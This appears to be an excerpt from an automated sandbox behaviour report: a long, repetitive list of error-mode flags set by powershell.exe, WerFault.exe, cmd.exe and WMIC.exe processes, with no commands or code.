Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
